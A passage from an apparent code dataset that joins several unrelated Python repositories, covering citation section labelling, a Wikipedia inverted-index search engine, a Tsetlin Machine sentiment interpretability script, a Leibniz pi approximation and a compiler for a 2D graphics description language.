print("yes")
data['sectionName'] = "introduction"
elif("related work" in extended.lower()):
print("yes")
data['sectionName'] = "related work"
elif("method" in extended.lower()):
print("yes")
data['sectionName'] = "methods"
elif("experiments" in extended.lower()):
data['sectionName'] = "experiments"
elif("results" in extended.lower()):
data['sectionName'] = "results"
elif("conclusion" in extended.lower()):
data['sectionName'] = "conclusion"
else: data['sectionName'] = None
except:
data['sectionName'] = None
# extended = data['sectionName']
# print(extended.lower())
return data
if __name__ == '__main__':
for file_name in file_names:
instances = list(jsonlines.open(f"../../data/scicite/{file_name}"))
new_instances = list(map(process_json, instances))
f = open(f"../../data/scicite/processed_{file_name}", "w")
writer = jsonlines.Writer(f)
writer.write_all(new_instances)
f.close()
``` |
{
"source": "jiviteshjain/wiki-search",
"score": 3
} |
#### File: wiki-search/src-hi/merge.py
```python
import os
import heapq
import config as conf
import sys
import shutil
class HeapNode:
def __init__(self, word, posting_list, file_id):
self._word = word
self._posting_list = posting_list
self._file_id = file_id
def Word(self):
return self._word
def PostingList(self):
return self._posting_list
def FileId(self):
return self._file_id
def __lt__(self, other):
if self._word != other.Word():
return self._word < other.Word()
return self._file_id < other.FileId()
class FinalFileHandler:
def __init__(self, path):
self._path = path
self._file_count = 0
self._heads = []
self._lines = []
self._word_count = 0
def AddLine(self, word, posting_list):
if len(self._lines) == 0:
self._heads.append(word)
line = word + ':' + posting_list
self._lines.append(line)
self._word_count += 1
if len(self._lines) >= conf.TOKENS_PER_FINAL_FILE:
with open(os.path.join(self._path, f'{self._file_count}.txt'), 'w') as f:
for line in self._lines:
f.write(line + '\n')
self._file_count += 1
self._lines = []
def Close(self):
if len(self._lines) >= 0:
with open(os.path.join(self._path, f'{self._file_count}.txt'), 'w') as f:
for line in self._lines:
f.write(line + '\n')
self._file_count += 1
self._lines = []
if len(self._heads) > 0:
with open(os.path.join(self._path, conf.FIRST_WORD_FILE), 'w') as f:
for line in self._heads:
f.write(line + '\n')
self._heads = []
return self._word_count
class IntermediatePageHandler:
def __init__(self, path):
self._path = os.path.join(path, conf.INTERMED_DIR)
self._files = []
for file in os.listdir(self._path):
try:
f = open(os.path.join(self._path, file), 'r', conf.INTERMED_FILE_READ_BUFFER)
self._files.append(f)
except IOError:
print(f'Failed to open intermediate file: {file}. Skipping.', file=sys.stderr)
self._eofs = set()
def __len__(self):
return len(self._files)
def ReadLine(self, file_id):
if file_id in self._eofs:
return None
try:
line = self._files[file_id].readline().strip()
except IOError:
print(f'Failed to read from intermediate file: {file_id}. Skipping.', file=sys.stderr)
self._eofs.add(file_id)
return None
if len(line) == 0:
self._eofs.add(file_id)
return None
word, posting_list = line.split(':')
return HeapNode(word, posting_list, file_id)
def Close(self):
for f in self._files:
try:
f.close()
except IOError:
print(f'Failed to close an intermediate file. Skipping.', file=sys.stderr)
pass
shutil.rmtree(self._path)
def Merge(path):
intermed_handler = IntermediatePageHandler(path)
heap = [intermed_handler.ReadLine(i) for i in range(len(intermed_handler))]
heapq.heapify(heap)
final_handler = FinalFileHandler(path)
current_word = ''
current_posting_list = ''
while len(heap) > 0:
next_node = heap[0]
heapq.heappop(heap)
if next_node.Word() == current_word:
current_posting_list += next_node.PostingList()
else:
if len(current_posting_list) > 0:
final_handler.AddLine(current_word, current_posting_list)
current_word = next_node.Word()
current_posting_list = next_node.PostingList()
new_node = intermed_handler.ReadLine(next_node.FileId())
if new_node is not None:
heapq.heappush(heap, new_node)
if len(current_posting_list) > 0:
final_handler.AddLine(current_word, current_posting_list)
word_count = final_handler.Close()
intermed_handler.Close()
return word_count
```
#### File: wiki-search/src-hi/search.py
```python
import os
import config as conf
from bisect import bisect_right
from parse import TextProcessor
import linecache
from multiprocessing import Pool
from itertools import repeat
import math
from random import randrange
from datetime import datetime, timedelta
class IndexHeadsManager:
def __init__(self, path):
with open(os.path.join(path, conf.FIRST_WORD_FILE), 'r') as f:
self._heads = [h.strip() for h in f.readlines()]
# UNUSED
def _BinarySearch(self, key):
low = 0
high = len(self._heads) - 1
while low <= high:
mid = (low + high) // 2
if self._heads[mid] == key:
return mid
elif self._heads[mid] < key:
if mid < high and self._heads[mid + 1] <= key:
low = mid + 1
else:
return mid
else:
high = mid - 1
return -1
def GetFile(self, key):
# From Python's documentation of bisect. Returns the rightmost
# element less than or equal to key.
# Returns -1 if not found.
return bisect_right(self._heads, key) - 1
class TitleManager:
def __init__(self, path):
self._path = os.path.join(path, conf.TITLES_DIR)
def GetTitle(self, article_id):
file_id = article_id // conf.TITLES_PER_FILE
line_num = (article_id % conf.TITLES_PER_FILE) + 1
# Returns empty string on error.
return linecache.getline(os.path.join(self._path, f'{file_id}.txt'), line_num).strip().lower()
# UNUSED
def FieldAgnosticSearch(token, index_heads, path):
search_results = {
't': [], 'i': [], 'b': [], 'c': [], 'l': [], 'r': []
}
file_id = index_heads.Search(token)
if file_id < 0:
return search_results
with open(os.path.join(path, f'{file_id}.txt'), 'r') as f:
for line in f:
word, posting_string = line.strip().split(':')
if word == token:
break
else:
return search_results
posting_list = posting_string.split('d')[1:] # Gauranteed to start with 'd' and be non-empty.
# Skip the empty string in the beginning.
parsed_posting_list = [Searcher._ParsePosting(p) for p in posting_list]
for doc in parsed_posting_list:
for field in doc.keys():
if field != 'd':
search_results[field].append(doc['d'])
return search_results
def ProcessPostingString(posting_string, fields, num_docs):
posting = Searcher.ParsePosting(posting_string)
tf = ((conf.WEIGHT_TITLE * posting['t']) + \
(conf.WEIGHT_INFOBOX * posting['i']) + \
(conf.WEIGHT_BODY * posting['b']) + \
(conf.WEIGHT_CATEGORY * posting['c']) + \
(conf.WEIGHT_LINKS * posting['l']) + \
(conf.WEIGHT_REFERENCES * posting['r']) + 1)
# Only in case of field queries, increase the weights of those fields.
for field in fields:
if field != 'a':
tf += (conf.WEIGHT_REQUESTED_FIELD * posting[field])
idf = conf.NUM_ARTICLES / num_docs
return posting['d'], math.log10(tf) * math.log10(idf)
class Searcher:
def __init__(self, path, text_processor, index_heads, titles, pool):
self._path = path
self._text_processor = text_processor
self._index_heads = index_heads
self._titles = titles
self._pool = pool
@classmethod
def _ParseQueryFields(cls, query):
if ':' not in query:
return {'a': query}
query_fields = {}
query_parts = query.strip().split(':')
for i in range(1, len(query_parts)):
field = query_parts[i-1][-1]
field_string = query_parts[i]
if i != len(query_parts)-1:
field_string = field_string[:-1]
if field in query_fields:
query_fields[field] += (' ' + field_string)
else:
query_fields[field] = field_string
return query_fields
@classmethod
def ParsePosting(cls, posting):
parsed_posting = {}
field = 'd'
cur = ''
for c in posting:
if c.isalpha() and c.islower():
parsed_posting[field] = int(cur, base=conf.ENCODING_BASE)
field = c
cur = ''
else:
cur += c
if len(cur) > 0:
parsed_posting[field] = int(cur, base=conf.ENCODING_BASE)
# Set empty fields to 0.
for field in ('t', 'i', 'b', 'c', 'l', 'r'): # 'd' is guaranteed to be present.
if field not in parsed_posting:
parsed_posting[field] = 0
return parsed_posting
def _SearchToken(self, token, fields):
file_id = self._index_heads.GetFile(token)
if file_id < 0:
return {}
with open(os.path.join(self._path, f'{file_id}.txt'), 'r') as f:
for line in f:
word, posting_string = line.strip().split(':') # Gauranteed to have ':' and
# non empty parts on both sides.
if word == token:
break
else:
return {}
posting_list = posting_string.split('d')[1:] # Gauranteed to start with 'd' and be non-empty.
# Skip the empty string in the beginning.
search_results = self._pool.starmap(ProcessPostingString,
zip(posting_list, repeat(fields), repeat(len(posting_list))))
return search_results
def Search(self, query):
query_fields = self._ParseQueryFields(query)
# Invert the query fields, storing for every token, the field(s)
# in which it is desired.
query_tokens = {}
for field, field_string in query_fields.items():
field_tokens = self._text_processor.Clean(field_string)
for token in field_tokens:
if token not in query_tokens:
query_tokens[token] = [field, ]
else:
query_tokens[token].append(field)
token_matches = [self._SearchToken(*x) for x in zip(query_tokens.keys(),
query_tokens.values())]
# Aggregate results across terms, by adding the scores.
scored_matches = {}
for token_match in token_matches:
for article_id, tfidf in token_match:
if article_id in scored_matches:
scored_matches[article_id] += tfidf
else:
scored_matches[article_id] = tfidf
# Sort the results.
search_results = sorted(scored_matches.keys(), reverse=True,
key=lambda x: scored_matches[x])
if conf.STRICTLY_RETURN_NUM_RESULTS:
while len(search_results) < conf.NUM_RESULTS:
random_article_id = randrange(conf.NUM_ARTICLES)
if random_article_id not in search_results:
search_results.append(random_article_id)
entitled_search_results = [(r, self._titles.GetTitle(r))
for r in search_results[:conf.NUM_RESULTS]]
return entitled_search_results
# %%
def Search(index_path, queries):
text_processor = TextProcessor()
index_heads = IndexHeadsManager(index_path)
titles = TitleManager(index_path)
pool = Pool(conf.NUM_SEARCH_WORKERS)
searcher = Searcher(index_path, text_processor, index_heads, titles, pool)
search_results = []
run_times = []
for query in queries:
begin = datetime.now()
search_results.append(searcher.Search(query))
end = datetime.now()
delta = end - begin
run_times.append(delta / timedelta(seconds=1))
pool.close()
pool.join()
return search_results, run_times
# %%
``` |
{
"source": "jivitesh-sharma/Drop-Clause-Interpretable-TM",
"score": 2
} |
#### File: Drop-Clause-Interpretable-TM/examples/SSTDemoWeightedClauses_Interpret.py
```python
import re
import string
import nltk
from nltk.tokenize import word_tokenize
from string import punctuation
from nltk.corpus import stopwords
nltk.download('punkt')
nltk.download('stopwords')
import pandas as pd
from nltk.stem import PorterStemmer
from nltk import FreqDist
from nltk.tokenize import RegexpTokenizer
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn import metrics
from PyTsetlinMachineCUDA.tm import MultiClassTsetlinMachine
nltk.download('wordnet')
from time import time
stop_words = set(stopwords.words('english'))
tokenizerR = RegexpTokenizer(r'\w+')
from numpy import save
from nltk.stem import WordNetLemmatizer
stop_words = set(stopwords.words('english'))
alpha = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
from argparse import ArgumentParser
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
parser = ArgumentParser()
parser.add_argument('-interpret', type=bool, default=False)
parser.add_argument('-n_clauses_per_class', type=int, default=5000)
parser.add_argument('-s', type=float, default=5.0)
parser.add_argument('-T', type=int, default=80)
parser.add_argument('-drop_clause', type=float, default=0.0)
parser.add_argument('-state_bits', type=int, default=8)
parser.add_argument('-features', type=int, default=7500)
parser.add_argument('-gpus', type=int, default=1)
parser.add_argument('-stop_train', type=int, default=250)
config = parser.parse_args()
col_list = ["text", "label"]
df = pd.read_csv('sst2.csv')
label = df.iloc[:,0:1].values
textOrig = df.iloc[:,1:2].values
y = np.reshape(label, len(label))
print(textOrig.shape)
def prepreocess(data):
input_data=[]
vocab = []
for i in data:
for j in i:
j = j.lower()
j = j.replace("\n", "")
j = j.replace('n\'t', 'not')
j = j.replace('\'ve', 'have')
j = j.replace('\'ll', 'will')
j = j.replace('\'re', 'are')
j = j.replace('\'m', 'am')
j = j.replace('/', ' / ')
j = j.replace('-', ' ')
j = j.replace('!', ' ')
j = j.replace('?', ' ')
j = j.replace('+', ' ')
j = j.replace('*', ' ')
while " " in j:
j = j.replace(' ', ' ')
while ",," in j:
j = j.replace(',,', ',')
j = j.strip()
j = j.strip('.')
j = j.strip()
temp1 = tokenizerR.tokenize(j)
temp2 = [x for x in temp1 if not x.isdigit()]
temp3 = [w for w in temp2 if not w in alpha]
#temp4 = [w for w in temp3 if not w in stop_words]
input_data.append(temp3)
return input_data
input_text = prepreocess(textOrig)
inputtext = []
for i in input_text:
ps = PorterStemmer()
temp4 = []
for m in i:
temp_temp =ps.stem(m)
temp4.append(temp_temp)
inputtext.append(temp4)
newVocab =[]
for i in inputtext:
for j in i:
newVocab.append(j)
print(len(newVocab))
fdist1 = FreqDist(newVocab)
tokens1 = fdist1.most_common(config.features)
full_token_fil = []
for i in tokens1:
full_token_fil.append(i[0])
sum1 = 0
for j in tokens1:
sum1 += j[1]
print('sum1', sum1)
vocab_unique = full_token_fil
vocab = np.asarray(full_token_fil)
np.savetxt('sst_vocab.csv', vocab, delimiter=',', fmt='%s')
def binarization_text(data4):
feature_set = np.zeros([len(data4), config.features], dtype=np.uint8)
tnum=0
for t in data4:
for w in t:
if (w in vocab_unique):
idx = vocab_unique.index(w)
feature_set[tnum][idx] = 1
tnum += 1
return feature_set
X_text = binarization_text(inputtext)
print("Text length:", X_text.shape)
tt = 6920
X_train = X_text[0:tt,:]
print("X_train length:", X_train.shape)
X_test = X_text[tt:,:]
print("X_test length:", X_test.shape)
ytrain = y[0:tt]
ytest = y[tt:]
print(ytest.shape)
X_dev = X_text[tt:,:]
Y_dev = y[tt:]
tm1 = MultiClassTsetlinMachine(config.n_clauses_per_class*2, config.T*16, config.s, clause_drop_p=config.drop_clause, number_of_gpus=config.gpus, number_of_state_bits=config.state_bits)
f = open("sst_weighted_%.1f_%d_%d_%.2f_%d_aug.txt" % (s, clauses, T, drop_clause, number_of_state_bits), "w+")
r_25 = 0
r_50 = 0
max = 0.0
for i in range(config.stop_train):
start_training = time()
tm1.fit(X_train, ytrain, epochs=1, incremental=True)
stop_training = time()
start_testing = time()
result2 = 100*(tm1.predict(X_train) == ytrain).mean()
result1 = 100*(tm1.predict(X_test) == ytest).mean()
#result1 = 0
stop_testing = time()
if result1 > max:
max = result1
if i >= 350:
r_50+=result1
if i >= 375:
r_25+=result1
print("#%d AccuracyTrain: %.2f%% AccuracyTest: %.2f%% Training: %.2fs Testing: %.2fs" % (i+1, result2, result1, stop_training-start_training, stop_testing-start_testing), file=f)
print("Average Accuracy last 25 epochs: %.2f \n" %(r_25/25), file=f)
print("Average Accuracy last 50 epochs: %.2f \n" %(r_50/50), file=f)
print("Max Accuracy: %.2f \n" %(max), file=f)
if config.interpret:
print('predicted Class: ', tm1.predict(X_train[4245:4246,:]))
triggClause = tm1.transform(X_train[4245:4246,:])
clauseIndex = []
for i in range(len(triggClause[0])):
if triggClause[0][i] ==1:
clauseIndex.append(i)
import nltk
from nltk.probability import FreqDist
originalFeatures = []
negatedFeatures = []
number_of_features = 1000
for j in range(0, 1500, 2):
#print("Clause #%d (%d): " % (j, tm1.get_weight(1, j)), end=' ')
l = []
for k in range(number_of_features*2):
if tm1.ta_action(0, j, k) == 1:
if k < number_of_features:
l.append(" x%d" % (k))
originalFeatures.append(k)
else:
l.append("¬x%d" % (k-number_of_features))
negatedFeatures.append(k-number_of_features)
#print(" ∧ ".join(l))
fdist1 = FreqDist(negatedFeatures)
negatedWords = fdist1.most_common(200)
fdist2 = FreqDist(originalFeatures)
originalWords = fdist2.most_common(20)
print('full original word')
fulloriginalword=[]
for i in originalWords:
fulloriginalword.append(i[0])
fullnegatedword =[]
print('full negated word')
for i in negatedWords:
fullnegatedword.append(i[0])
originalFeatures2 = []
negatedFeatures2= []
for j in clauseIndex:
if j < 1500 and j%2==0:
#print("Clause #%d (%d): " % (j, tm1.get_weight(1, j)), end=' ')
l = []
for k in range(number_of_features*2):
if tm1.ta_action(0, j, k) == 1:
if k < number_of_features:
l.append(" x%d" % (k))
originalFeatures2.append(k)
else:
l.append("¬x%d" % (k-number_of_features))
negatedFeatures2.append(k-number_of_features)
fdist3 = FreqDist(negatedFeatures2)
negatedWords2 = fdist3.most_common(100)
fdist4 = FreqDist(originalFeatures2)
originalWords2 = fdist4.most_common(10)
neededoriginalword =[]
print('needed original word')
for i in originalWords2:
neededoriginalword.append(i[0])
needednegatedword =[]
print('needed negated word')
for i in negatedWords2:
needednegatedword.append(i[0])
#Save fulloriginalword, fullnegatedword, neededoriginalword, or needednegatedword (Preferred needednegatedword for interpretability)
interpretList = np.asarray(needednegatedword)
np.savetxt('interpretFile.csv', interpretList, fmt='%s')
df = pd.read_csv('interpretFile.csv', dtype=str, header=None)
df1 = df.iloc[:,:]
full1 = df.iloc[:,:].values
#full1= np.reshape(full1,(10,20))
index = np.arange(100)
letter2num = {}
for i in range(len(index)):
letter2num[full1[i][0]] =i
print(letter2num)
df2 = pd.DataFrame(np.array( [letter2num[i] for i in df1.values.flat] ).reshape(df1.shape))
print(df2)
colors = ["white"] # use hex colors here, if desired.
cmap = ListedColormap(colors)
full2 = df.iloc[:,:].values
full2= np.reshape(full2,(10,10))
full3 = df2.iloc[:,:].values
full3= np.reshape(full3,(10,10))
fig, ax = plt.subplots()
ax.imshow(full3,cmap='YlOrBr_r')
for i in range(len(full2)):
for j in range(10):
ax.text(j,i, full2[i,j], ha="center", va="center")
plt.axis('off')
ax.set_aspect(0.3)
plt.grid(True)
plt.show()
``` |
{
"source": "Jivko26/Python-Playground",
"score": 4
} |
#### File: Python-Playground/Gregory-Leibnitz Pi approximation/Solution.py
```python
calculations = int(input())
def leibnitz(calculations):
divider = 3
n = 2
result = 1/1
while n <= calculations:
if n % 2 == 0:
result -= 1/divider
else:
result += 1/divider
divider += 2
n += 1
return 4 * result
output = leibnitz(calculations)
print(output)
``` |
{
"source": "jivnov/Language-for-2D-graphics",
"score": 4
} |
#### File: Language-for-2D-graphics/twodim_compiler/drawing.py
```python
import svgwrite as svg
from graph import Vertex, Graph
class Drawing2d:
def __init__(self, w, h, output_path='./generated_images/output.svg'):
"""
:param w:
:param h:
"""
self.viewport_width = w
self.viewport_height = h
self.canvas = svg.Drawing(output_path, (w, h))
def draw(self, v: Vertex, parent: Vertex = None):
# TODO: Draw all neighbours and neighbours' neighbours etc.
"""
Basic algo:
1. Go "up" (check the IN reference) until you reach the root of the graph
NOTE: When adding a neighbour A to a Vertex B CONTAINED in some shape X, you should add "A IN X" relation automatically as well
2. Draw root shape parent_graphX
3. Call algo for each of X's neighbours until there are no neighbours to draw
:param parent: Parent of the vertex; if None, assume this is the root
:param v:
:return:
"""
if v.drawn:
return
v.draw(self.canvas)
def _graph_to_something_insertable(self, graph: Graph):
# TODO: This helper method should enable defining relations between Vertices and Graphs
# TIP: We may want to use <defs> tag for this
pass
```
#### File: Language-for-2D-graphics/twodim_compiler/FunctionParserListener.py
```python
import graph
from Function import Function
from TwoDimParser import TwoDimParser
from TwoDimParserListener import TwoDimParserListener
from exceptions import FunctionSignatureError
class FunctionParserListener(TwoDimParserListener):
def __init__(self, global_context, func_relations_graph, call_id=None):
super().__init__()
self.func_relations_graph = func_relations_graph
self.context = global_context
self.function_call_id = call_id
def enterShapeSpec(self, ctx: TwoDimParser.ShapeSpecContext):
try:
for i, var_name in enumerate(ctx.IDENTIFIER()):
# TODO
# At the moment assuming SIZE is the only argument
color_vals = None
if ctx.shapeColor(i) is not None:
color_vals = tuple(int(decimal_lit.getText()) for decimal_lit in ctx.shapeColor(i).DECIMAL_LIT())
v = graph.Vertex(parent_graph=self.func_relations_graph,
shape=ctx.typeName().getText(),
args=[size_lit.getText() for size_lit in ctx.shapeArguments(i).SIZE_LIT()],
color=color_vals
)
self.func_relations_graph.add_vertex(v)
self.context.variables.add_variable(tag=var_name.getText(), name=v.uid, content=v, scope=self.function_call_id)
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterAssignmentDeclarationStmt(self, ctx: TwoDimParser.AssignmentDeclarationStmtContext):
try:
v_from_func: graph.Vertex = self.enterFunctionCall(ctx.functionCall())
# Remove the function call after calculating its output so the Walker doesn't enter it a second time
ctx.removeLastChild()
# TODO: At the moment assuming SIZE is the only argument
v = graph.Vertex(parent_graph=self.func_relations_graph,
shape='shape',
args=[size_lit.getText() for size_lit in ctx.shapeArguments().SIZE_LIT()],
content=v_from_func.content)
self.func_relations_graph.add_vertex(v)
self.context.variables.add_variable(tag=ctx.IDENTIFIER().getText(), name=v.uid, content=v)
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterRelationExpr(self, ctx: TwoDimParser.RelationExprContext):
var_name1 = ''
var_name2 = ''
try:
for relation_op_index in range(len(ctx.singleLevelRelationOp())):
var_name1 = ctx.primaryExpr(relation_op_index).operand().operandName().getText()
var_name2 = ctx.primaryExpr(relation_op_index + 1).operand().operandName().getText()
op1 = self.context.variables.find_var_by_tag(tag=var_name1, scope=self.function_call_id).data
op2 = self.context.variables.find_var_by_tag(tag=var_name2, scope=self.function_call_id).data
self.func_relations_graph\
.add_relation(op1, op2, graph.Relation.from_string(ctx.singleLevelRelationOp(relation_op_index).getText()))
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterFunctionCall(self, ctx: TwoDimParser.FunctionCallContext):
try:
# checking function call for correctness
args_for_check = []
args_for_call = []
argument_ids = [opName.IDENTIFIER().getText() for opName in ctx.operandName()]
for id in argument_ids:
try:
v = self.context.variables.find_var_by_tag(tag=id, scope=self.function_call_id)
shape = v.shape
if len(args_for_check) == 0 or args_for_check[len(args_for_check) - 1][0] != shape:
args_for_check.append([shape, 1])
else:
args_for_check[len(args_for_check) - 1][1] += 1
if v.unreachable:
raise graph.UndeclaredShapeException(id)
args_for_call.append(v)
except:
v = self.context.variables.find_var_by_tag(tag=id, scope=self.function_call_id).data
shape = v.shape
if len(args_for_check) == 0 or args_for_check[len(args_for_check) - 1][0] != shape:
args_for_check.append([shape, 1])
else:
args_for_check[len(args_for_check) - 1][1] += 1
if v.unreachable:
raise graph.UndeclaredShapeException(id)
args_for_call.append(v)
function_called = Function(name=ctx.IDENTIFIER().getText(), args=args_for_check)
if not self.context.check_call(function_called):
raise FunctionSignatureError(function_called.name)
function_result = self.context.call_function(global_graph=self.func_relations_graph,
name=ctx.IDENTIFIER().getText(), args=args_for_call,
parent_id=self.function_call_id)
return function_result
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
```
#### File: Language-for-2D-graphics/twodim_compiler/graph.py
```python
import copy
import logging
import uuid
from collections import OrderedDict
from enum import Enum
from typing import Any, Dict, Tuple
from svgwrite.container import SVG
from svgwrite.shapes import Rect
from exceptions import DisconnectedGraphException, UndeclaredShapeException, UndefinedShapeException, \
RedundantRelationException, UndefinedRelationException, CyclicRelationsException
class Shape(Enum):
SQUARE = 1
CIRCLE = 2
RECT = 3
TRIANGLE = 4
SHAPE = 5
@staticmethod
def from_string(shape_name: str):
if shape_name.lower() == "rect":
return Shape.RECT
elif shape_name.lower() == "square":
return Shape.SQUARE
elif shape_name.lower() == "circle":
return Shape.CIRCLE
elif shape_name.lower() == "triangle":
return Shape.TRIANGLE
elif shape_name.lower() == "shape":
return Shape.SHAPE
else:
raise UndefinedShapeException(f"Specified shape type is not supported: {shape_name}")
class Relation(Enum):
# TODO: [Note for the future] For a relation to be true between a graph G and a vertex V it should be true between V and each vertex of graph G
UNRELATED = 0
LEFT = 1
RIGHT = -1
TOP = 2
BOT = -2
IN = 3
CONTAINED = -3 # Opposite of IN
ON = 4
UNDER = -4
ATLEFT = LEFT * 100 # Meaning: Align the left border of these two shapes
ATRIGHT = RIGHT * 100
ATTOP = TOP * 100
ATBOT = BOT * 100
def __neg__(self):
return Relation(-self.value)
def at(self):
if self.value % 100 == 0:
return self
else:
return Relation(self.value * 100)
@staticmethod
def from_string(relation_name: str):
if relation_name.upper() == "LEFT":
return Relation.LEFT
elif relation_name.upper() == "RIGHT":
return Relation.RIGHT
elif relation_name.upper() == "TOP":
return Relation.TOP
elif relation_name.upper() == "BOT":
return Relation.BOT
elif relation_name.upper() == "IN":
return Relation.IN
elif relation_name.upper() == "CONTAINED":
return Relation.CONTAINED
elif relation_name.upper() == "ON":
return Relation.ON
elif relation_name.upper() == "UNDER":
return Relation.UNDER
elif relation_name.upper() == "ATLEFT":
return Relation.ATLEFT
elif relation_name.upper() == "ATRIGHT":
return Relation.ATRIGHT
elif relation_name.upper() == "ATTOP":
return Relation.ATTOP
elif relation_name.upper() == "ATBOT":
return Relation.ATBOT
else:
raise UndefinedRelationException(f"Relation named \"{relation_name}\" doesn\'t exist")
class Vertex:
def __init__(self, shape: str = 'shape', args: Any = None, content=None, parent_graph=None,
color: Tuple[int, ...] = None):
"""
:param parent_graph: Graph that contains this Vertex
:param shape: Type of this variable
:param args: Arguments passed to the variable initialization in code
:param content: Type should be Graph or None; allows for comparison between graphs and shapes
"""
self.uid = uuid.uuid1() # This will allow editting svg files after calling draw() on parts of the graph; the
# program can reference any shape by its unique ID or at least try to make a unique variable for each unique ID
self.updated = False
self.drawn = False
self.graph = parent_graph # Graph that this shape is a part of
self.LEFT: OrderedDict[Vertex, Any] = OrderedDict()
self.RIGHT: OrderedDict[Vertex, Any] = OrderedDict()
self.TOP: OrderedDict[Vertex, Any] = OrderedDict()
self.BOT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATLEFT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATRIGHT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATTOP: OrderedDict[Vertex, Any] = OrderedDict()
self.ATBOT: OrderedDict[Vertex, Any] = OrderedDict()
self.IN: Vertex = None
self.CONTAINED: OrderedDict[Vertex, Any] = OrderedDict()
self.ON: OrderedDict[Vertex, Any] = OrderedDict()
self.UNDER: OrderedDict[Vertex, Any] = OrderedDict()
self.unreachable = False
self.content = content
if isinstance(shape, Shape):
self.shape = shape
else:
self.shape = Shape.from_string(shape)
# Saving it here to use in functions
self.size_args = copy.copy(args)
# Determine Bounding Box fractional size through passed arguments
self.bb_w = 100.0
self.bb_h = 100.0
if isinstance(args, list) and len(args) > 0:
self.bb_w = float(args.pop(0).replace('%', ''))
# If second dimension was passed use it for height
if len(args) > 0:
self.bb_h = float(args.pop(0).replace('%', ''))
# Adjust Bounding Box fractional size based on shape
self.adjust_size_based_on_shape()
width = self.bb_w
height = self.bb_h
x = 100.0 - self.bb_w
y = 100.0 - self.bb_h
# Use svgwrite features for shape properties
if isinstance(color, tuple) and len(color) > 0:
if len(color) == 3:
self.color = color
elif len(color) > 3:
self.color = tuple(list(color)[:3])
else:
self.color = tuple(list(color) + [0] * (3 - len(color)))
else:
self.color = (0, 0, 0)
if self.shape == Shape.RECT:
self.content = Rect(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"),
fill="rgb" + str(self.color))
elif self.shape == Shape.SHAPE:
if self.content is None:
self.content = SVG(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"))
else:
# This is (probably) assignment declaration; constraint the content size but do not create new content
self.width = self.bb_w
self.height = self.bb_h
else:
raise UndefinedShapeException(f"Specified shape type is not supported: {self.shape}")
def __str__(self):
return f"{self.shape} [{self.width_perc}, {self.height_perc}] at: (x={self.x_perc}, y={self.y_perc})"
@property
def neighbours(self) -> OrderedDict:
result = self.LEFT.copy()
for d in (self.RIGHT, self.TOP, self.BOT, self.ATLEFT, self.ATRIGHT, self.ATTOP, self.ATBOT):
result.update(d)
return result
def draw(self, canvas):
"""
Pass drawing responsibility to parent graph;
:param canvas:
:return:
"""
self.graph.draw(canvas, caller_vertex=self)
def adjust_size_based_on_shape(self):
# Adjust Bounding Box fractional size based on shape
if self.shape == Shape.SQUARE or self.shape == Shape.CIRCLE:
self.bb_h = self.bb_w = min(self.bb_h, self.bb_w)
# Getters and setters for SVG element position - you should only be passing and receiving floats from these parameters (instead of strings like "10.5%")
@property
def x_perc(self):
"""
:return: Element's 'x' coordinate in a string formatted like: "10.5%" "25%" etc.
"""
return self.content['x']
@property
def x(self):
return float(self.content['x'].replace("%", ""))
@x.setter
def x(self, val):
self.content['x'] = f"{val}%"
@property
def y_perc(self):
return self.content['y']
@property
def y(self):
return float(self.content['y'].replace("%", ""))
@y.setter
def y(self, val):
self.content['y'] = f"{val}%"
@property
def width_perc(self):
return self.content['width']
@property
def width(self):
return float(self.content['width'].replace("%", ""))
@width.setter
def width(self, val):
self.content['width'] = f"{val}%"
@property
def height_perc(self):
return self.content['height']
@property
def height(self):
return float(self.content['height'].replace("%", ""))
@height.setter
def height(self, val):
self.content['height'] = f"{val}%"
def center_horizontally_if_legal(self):
if len(self.LEFT) == 0 and len(self.RIGHT) == 0 and len(self.ATLEFT) == 0 and len(self.ATRIGHT) == 0:
self.x = (100 - self.width) / 2
def center_vertically_if_legal(self):
if len(self.TOP) == 0 and len(self.BOT) == 0 and len(self.ATTOP) == 0 and len(self.ATBOT) == 0:
self.y = (100 - self.height) / 2
def center_if_legal(self):
self.center_horizontally_if_legal()
self.center_vertically_if_legal()
# HORIZONTAL RELATIONS
def is_left(self, other) -> bool:
return self.x <= other.x - self.width
def is_right(self, other) -> bool:
return self.x >= other.x + other.width
def to_left_of(self, other):
"""
Move this vertex to the left side of other vertex
:param other:
:return:
"""
self.x = other.x - self.width
def to_right_of(self, other):
"""
Move this vertex to the right side of other vertex
:param other:
:return:
"""
self.x = other.x + other.width
# HORIZONTAL "ALIGN/AT" RELATIONS
def is_atleft(self, other) -> bool:
return self.x == other.x
def is_atright(self, other) -> bool:
return self.x + self.width == other.x + other.width
def to_atleft_of(self, other):
self.x = other.x
def to_atright_of(self, other):
self.x = other.x + other.width - self.width
# VERTICAL RELATIONS
def is_top(self, other) -> bool:
return self.y <= other.y - self.height
def is_bot(self, other) -> bool:
return self.y >= other.y + other.height
def to_top_of(self, other):
"""
Move this vertex to the left side of other vertex
:param other:
:return:
"""
self.y = other.y - self.height
def to_bot_of(self, other):
"""
Move this vertex to the right side of other vertex
:param other:
:return:
"""
self.y = other.y + other.height
# VERTICAL "ALIGN/AT" RELATIONS
def is_attop(self, other) -> bool:
return self.y == other.y
def is_atbot(self, other) -> bool:
return self.y + self.height == other.y + other.height
def to_attop_of(self, other):
self.y = other.y
def to_atbot_of(self, other):
self.y = other.y + other.height - self.height
def add_neighbour(self, v, relation: Relation):
